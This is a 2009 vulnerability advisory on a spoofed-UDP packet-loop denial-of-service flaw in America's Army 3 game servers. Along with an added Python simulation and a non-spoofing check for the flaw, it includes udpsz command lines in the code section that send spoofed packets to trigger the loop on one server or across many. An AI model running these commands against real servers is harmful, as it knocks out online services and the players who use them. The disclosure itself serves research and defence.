americasarmy-loop.txt
Posted on 14 July 2009
Source: packetstormsecurity.org
#######################################################################
Luigi Auriemma
Application: America's Army 3
http://www.americasarmy.com/aa3.php
Versions: <= 3.0.5
Platforms: Windows
Bug: packets loop
Exploitation: remote, versus server
Date: 14 Jul 2009
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
America's Army 3 (AA3) is the new free game of the AA series, developed
for the U.S. Army as an aid to military recruiting.
Released about 20 days ago, it is already played by thousands of players
on more than 400 online servers
(http://login.aa3.americasarmy.com/servers).
#######################################################################
======
2) Bug
======
Port 39300 (or 9002 in LAN mode) of the server is used to answer the
queries of the AA3 clients, sending them back all the information about
the status of the server and the match.
If the incoming query is invalid, the server replies with a packet
containing the "resultCode" "errorMessage" "failed to validate field
contents" message.
The problem is that this error packet is also sent back when the
incoming packet is itself that same error message. So it is enough for
an attacker to send one spoofed packet, valid or invalid, to the query
port of the server, using the server's own IP address and port as the
source, to put it in an endless "ping-pong" state in which it sends
and receives its own packets forever.
On its own the effect does not look very dangerous: the server keeps
running and players can still join it, except for possible lag caused
by the CPU reaching almost 100% (an effect increased by the
introduction of the leverage ssc encryption of the query/reply packets
in version 3.0.5).
But there is another kind of attack based on this vulnerability which
could allow an automatic distributed Denial of Service among all the
internet AA3 servers.
In practice, if there are for example 400 servers online, the attacker
only needs to send a packet spoofed from the first server's address and
query port to the other 399, then do the same with the second, the
third and so on, creating an endless flood across the entire network
of servers: each server answers the error packet of the other with its
own error packet.
As already said, the vulnerability requires the ability to send
spoofed packets, so the attacker must be able to do so (i.e. send from
a network that does not filter spoofed source addresses).
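The reply-to-reply behaviour described above, simulated in Python as an
added example that is not part of the advisory or of the game's code. It
models three query-port handlers (the vulnerable one, a tempting partial
fix that only rejects datagrams claiming to come from the server's own
address, and a hardened one that never answers invalid queries) and
delivers one spoofed datagram into a one-server and a two-server
network. Payloads, addresses (TEST-NET-3), the in-memory delivery model
and the class and function names are assumptions; the real AA3 wire
format is not used.

```python
"""Simulation of the AA3 query-port "packet loop" (added example, not the
advisory's code).  It models only the behaviour the advisory describes: a
query server that answers any invalid datagram with a fixed error reply
and therefore also answers that error reply when it arrives, spoofed, from
its own address or from another server.  Payloads, addresses and the
delivery model are assumptions; the real AA3 wire format is not used."""
from collections import deque
from typing import Deque, Dict, Optional, Tuple

Addr = Tuple[str, int]               # (ip, port)
Datagram = Tuple[Addr, Addr, bytes]  # (source, destination, payload)

# Assumed payloads: one query the server accepts, and the error reply the
# advisory quotes (its real encoding is not reproduced here).
VALID_QUERY = b"\x00\x01serverinfo"
ERROR_REPLY = b'"resultCode" "errorMessage" "failed to validate field contents"'
STATUS_REPLY = b"status:ok"


class VulnerableQueryServer:
    """Answers everything: a valid query gets STATUS_REPLY, any other
    datagram (including ERROR_REPLY itself) gets ERROR_REPLY."""

    def __init__(self, addr: Addr) -> None:
        self.addr = addr

    def handle(self, src: Addr, payload: bytes) -> Optional[bytes]:
        if payload == VALID_QUERY:
            return STATUS_REPLY
        return ERROR_REPLY


class SelfCheckOnlyServer(VulnerableQueryServer):
    """The tempting partial fix: ignore datagrams that claim to come from
    this server's own query address.  Stops the self-loop, but not the
    cross-server ping-pong, whose datagrams carry another server's address."""

    def handle(self, src: Addr, payload: bytes) -> Optional[bytes]:
        if src == self.addr:
            return None
        return super().handle(src, payload)


class HardenedQueryServer(VulnerableQueryServer):
    """Silently drops anything that fails validation instead of answering it.
    With no error reply there is nothing to bounce: a spoofed datagram costs
    at most one STATUS_REPLY, which a receiving server in turn drops."""

    def handle(self, src: Addr, payload: bytes) -> Optional[bytes]:
        if payload != VALID_QUERY:
            return None
        return STATUS_REPLY


def simulate(servers: Dict[Addr, VulnerableQueryServer], first: Datagram,
             max_steps: int = 500) -> int:
    """Deliver one (possibly spoofed) datagram, then keep delivering whatever
    the servers send to each other until the traffic dies out or max_steps
    datagrams have been handled.  Returns the number handled; reaching
    max_steps means the loop never stopped on its own."""
    queue: Deque[Datagram] = deque([first])
    handled = 0
    while queue and handled < max_steps:
        src, dst, payload = queue.popleft()
        server = servers.get(dst)
        if server is None:            # not a query server: datagram is dropped
            continue
        handled += 1
        reply = server.handle(src, payload)
        if reply is not None:
            queue.append((dst, src, reply))  # reply goes to the claimed source
    return handled


def demo(max_steps: int = 500) -> Dict[str, int]:
    """Run the self-loop and the two-server loop against each server variant.
    Addresses are from the TEST-NET-3 documentation range (constructed)."""
    a: Addr = ("203.0.113.10", 39300)
    b: Addr = ("203.0.113.20", 39300)
    garbage = b"\xff\xffnot-a-query"      # constructed invalid query
    results: Dict[str, int] = {}
    for name, cls in (("vulnerable", VulnerableQueryServer),
                      ("self_check_only", SelfCheckOnlyServer),
                      ("hardened", HardenedQueryServer)):
        # One datagram spoofed from the server's own address and query port.
        results[name + "/self"] = simulate({a: cls(a)}, (a, a, garbage), max_steps)
        # One datagram to A spoofed from B's query port: the cross-server case.
        results[name + "/pair"] = simulate({a: cls(a), b: cls(b)},
                                           (b, a, garbage), max_steps)
    return results


if __name__ == "__main__":
    for scenario, count in demo().items():
        print(f"{scenario:22s} datagrams handled: {count}")
```

The self-address check stops only the single-server loop; in the
two-server case every datagram carries the other server's address, so
the ping-pong continues until something else breaks it. Dropping invalid
queries silently removes the reply that feeds the loop in both cases,
which is why "answer nothing you did not validate" is the fix to look
for, not source filtering at the application.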
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip

one spoofed packet from the server's own address and query port to
itself (the self "ping-pong"):

udpsz -P SERVER -p 39300 SERVER 39300 1
or
udpsz -l 10 -P SERVER -p 39300 SERVER 39300 1

the cross-server variant, spoofed from SECOND_SERVER to FIRST_SERVER:

udpsz -P SECOND_SERVER -p 39300 FIRST_SERVER 39300 1

note: LAN servers use port 9002 instead of 39300
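A check for the precondition of the loop that needs no spoofing, added
here as an example and not the advisory's tool (udpsz). From an ordinary
client it sends an invalid datagram, takes whatever the server answers
and sends that answer straight back: a server that replies to its own
error reply is one that will bounce it forever once the source is
spoofed. The probe sends only two datagrams and starts no loop. The junk
payload, the command-line arguments and the function names are
assumptions.

```python
"""Non-spoofing check for the reply-to-reply precondition of the loop.

Added example, not the advisory's tool.  It confirms, from an unspoofed
client, that a query server answers an invalid datagram with an error
reply AND answers that same error reply again.  Two datagrams are sent;
no loop is started because replies come back to us, not to the server."""
import socket
import sys
from typing import Callable, Dict, Optional

JUNK_QUERY = b"\x00\x00\x00\x00"   # assumed: any payload the server rejects

# An exchange sends one datagram and returns the first reply, or None.
Exchange = Callable[[bytes], Optional[bytes]]


def udp_exchange(host: str, port: int, timeout: float = 2.0) -> Exchange:
    """Build an exchange function backed by a real UDP socket."""
    def exchange(payload: bytes) -> Optional[bytes]:
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
            sock.settimeout(timeout)
            sock.sendto(payload, (host, port))
            try:
                data, _ = sock.recvfrom(65535)
            except socket.timeout:
                return None
        return data
    return exchange


def probe_reply_loop(exchange: Exchange) -> Dict[str, bool]:
    """Send junk, then send the server's own reply back.

    answers_invalid:   the server replied to the junk query at all
    answers_own_reply: it also replied when fed its own reply
    same_reply:        that second reply was byte-identical to the first,
                       i.e. the exact error-for-error pattern of the loop
    """
    first = exchange(JUNK_QUERY)
    if first is None:
        return {"answers_invalid": False,
                "answers_own_reply": False,
                "same_reply": False}
    second = exchange(first)
    return {"answers_invalid": True,
            "answers_own_reply": second is not None,
            "same_reply": second == first}


if __name__ == "__main__":
    # usage: probe.py HOST [PORT]   (39300 for internet servers, 9002 on LAN)
    target = sys.argv[1]
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 39300
    for key, value in probe_reply_loop(udp_exchange(target, target_port)).items():
        print(f"{key:18s} {value}")
```

A None from the socket can also mean UDP loss or a firewall, so treat a
negative as "not confirmed" and retry before concluding the server is
not affected. With the encrypted query/reply packets of 3.0.5 the junk
datagram is still an invalid query, so the check applies unchanged.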
#######################################################################
======
4) Fix
======
No fix.
#######################################################################